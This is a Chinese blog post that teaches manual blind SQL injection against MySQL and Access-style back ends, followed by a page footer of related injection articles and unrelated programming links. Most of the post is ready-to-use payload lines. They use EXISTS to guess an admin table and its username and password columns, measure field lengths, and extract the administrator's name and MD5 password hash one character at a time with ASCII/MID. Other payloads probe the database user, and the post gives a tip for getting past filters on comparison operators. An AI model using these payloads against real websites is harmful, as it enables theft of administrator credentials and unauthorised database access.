/*By:珍惜少年时*/

逐字解码法,不一定非要猜字段内容。库名,表名,字段,data,都能猜。

环境过滤了select、union(mysql5.0以下的版本就不支持union所以也可以用此方法),你可以用这方法。exists只是其中一种,还有别的方法也能猜。

注:mysql不支持top函数,请使用limit函数

注入思路:

  先把表跟字段猜解出来,猜解出来了.这个算是一个半猜解查询吧

00x1判断表是否存在

and exists (select * from admin) //猜解是否含有admin这个表

00x2判断字段是否存在

and exists (select username from admin) //猜解是否含有username这个字段
and exists (select password from admin) //猜解是否含有password这个字段

00x3字段长度的判断,判断了其长度更利于注入。比如判断了username的长度为五,那么极有可能是admin

username字段的判断:
and (select top 1 len(username) from admin)>5 //返回错误
and (select top 1 len(username) from admin)=5 //返回正确,说明username的单词长度为五个,很有可能是admin password字段的判断:
and (select top 1 len(password) from admin)>16 //返回错误
and (select top 1 len(password) from admin)=16 //返回正确,说明password的单词长度为十六位的,很可能是经过md5加密的.

00x4[猜解管理员账号] //使用ASCII转换即可获得加密内容.

and(select top 1 asc(mid(username,1,1)) from admin)>97 错误
and(select top 1 asc(mid(username,1,1)) from admin)=97 正确 则说明只有第一位的ASCII码为九十七
and(select top 1 asc(mid(username,2,1)) from admin)=100 第二位也是同理.只不过mid函数里要修改以下部分内容
and(select top 1 asc(mid(username,3,1)) from admin)=109
and(select top 1 asc(mid(username,4,1)) from admin)=105
and(select top 1 asc(mid(username,5,1)) from admin)=110

00x5[猜解管理员密码]//与猜解账号方法大同小异

公式:and(select top 1 asc(mid(password,a,n)) from admin)>97      //注:a大于n大1,后面的数字是ascii。

and(select top 1 asc(mid(password,1,1)) from admin)>97
and(select top 1 asc(mid(password,1,1)) from admin)=97
and(select top 1 asc(mid(password,2,1)) from admin)=50
and(select top 1 asc(mid(password,3,1)) from admin)=36
......................................................

然后将97 50 36 等ascii码拿去解密。即可拿到真正的md5值

当然了你还可以用逐字解码法来弄更多的东西

比如我们来讲一下,逐字解码法来判断数据库权限

在次我们要了解两个函数:

    1. Ord:该函数的作用是返回值字符串的第一个ASCII值
    2. Mid:用于得到函数的一部分,比如root里面的r

CODE区域:

and ord(mid(user(),1,1))=114/*

=》结合函数的意思来说,就是得到第一个字符的ascii值。如果等于114就返回正确。114的ASCII值是r

当“<”,“>”大小于符号被过滤的时候,可以通过greatest函数绕过。可参考:http://www.lijiejie.com/mysql-injection-bypass-waf/

此外ASCII逐字解码兴许还有很多我不知道的,恳求大家的分享。

THE END


■Ascii逐字解码法注入,mysql5.0一下版本手工注入的更多相关文章

  1. SQL手工注入小结

    第一步先把IE菜单=>工具=>Internet选项=>高级=>显示友好 HTTP 错误信息前面的勾去掉.否则,不论服务器返回什么错误,IE都只显示为HTTP 500服务器错误, ...

  2. Kali学习笔记42:SQL手工注入(4)

    前三篇文章都是在讲发现SQL注入漏洞 如何查询得到所有的信息 那么另一条思路还未尝试过:能否修改数据? 例如这样: '; update users set user='yiqing' where us ...

  3. phpcms手工注入教程

    目标服务器(靶机):192.168.1.27 目标网站:http://192.168.1.27:8083 步骤: 一.靶机操作 1.进入靶机,查看IP地址: 开始-运行,输入cmd回车,出现命令行窗口 ...

  4. Mysql5.0以上 手工注入

    Mysql5.0以上 order by 23 http://www..com/productdet.php?&id=89 and 1=2 UNION SELECT 1,2,3,4,5,6,7, ...

  5. MySQL5.0安装图解

    打开下载的mysql安装文件mysql-5.0.27-win32.zip,双击解压缩,运行"setup.exe",出现如下界面: 按"Next"继续 选择安装类 ...

  6. 【转】MySQL5安装的图解(mysql-5.0.27-win32.zip)

    转载地址:http://blog.csdn.net/xssh913913/article/details/1713182 MySQL5安装的图解(最新版) http://hi.baidu.com/yu ...

  7. MySQL5.0版本的安装图解教程

    MySQL5.0版本的安装图解教程是给新手学习的,当前mysql5.0.96是最新的稳定版本. mysql 下载地址 http://www.jb51.net/softs/2193.html 下面的是M ...

  8. Linux下编译安装mysql-5.0.45.tar.gz

    安装环境:VMware9(桥接模式) + Linux bogon 2.6.32-642.3.1.el6.x86_64(查看linux版本信息:uname -a) 先给出MySQL For Linux ...

  9. Windows+Atlassian-Jira-6.0.4+MySql5.0安装破解汉化

     Windows+Atlassian-Jira-6.0.4+MySql5.0安装破解汉化 一:整理的安装程序 例如以下图: 文件太大.上传不到csdn上.有须要的联系. 新增的百度云盘下载:链接: ...

随机推荐

  1. servlet的转发与重定向

    转发和重定向都能让浏览器获得另外一个URL所指向的资源,但两者的内部运行机制有着很大的区别. 1.转发:有两种方式获得转发对象(RequestDispatcher):一种是通过HttpServletR ...

  2. iOS不得姐项目--appearance的妙用,再一次设置导航栏返回按钮,导航栏左右按钮的封装(巧用分类)

    一.UI_APPEARANCE_SELECTOR 彩票项目中appearance的用法一直没有搞明白,这次通过第二个项目中老师的讲解,更深一层次的了解到了很多关于appearance的作用以及使用方法 ...

  3. xml文件的读写操作

    1.直接上代码:包含了xml文档的创建,读取xml文档,创建根节点,向根节点中添加子节点,保存xml文档----------先来张效果图: static void Main(string[] args ...

  4. Maven 初学(一)基本概念

    Pom中有三个主要元素 Groupid,artifactid,version goupid 是一个组织唯一的标识  例如 com.ibm.www artifactid  是一个工程呢ID        ...

  5. Nuget的使用命令

    Nuget的命令行操作都是在程序包管理器控制台下进行的:结构如图:

  6. Oracle 11g 默认用户名和密码

    安装ORACLE时,若没有为下列用户重设密码,则其默认密码如下: 用户名 / 密码                      登录身份                              说明 ...

  7. (BZOJ4538)HNOI2016 网络

    HNOI2016 Day1 T2 网络 Description 一个简单的网络系统可以被描述成一棵无根树.每个节点为一个服务器.连接服务器与服务器的数据线则看做一条树边.两个服务器进行数据的交互时,数 ...

  8. tarjan算法求强连通分量

    先上代码: #include <iostream> #include <cstring> #include <vector> #include <stack& ...

  9. HDU 1060 Left-most Digit

    传送门 Leftmost Digit Time Limit: 2000/1000 MS (Java/Others)    Memory Limit: 65536/32768 K (Java/Other ...

  10. Codeforces 85D Sum of Medians

    传送门 D. Sum of Medians time limit per test 3 seconds memory limit per test 256 megabytes input standa ...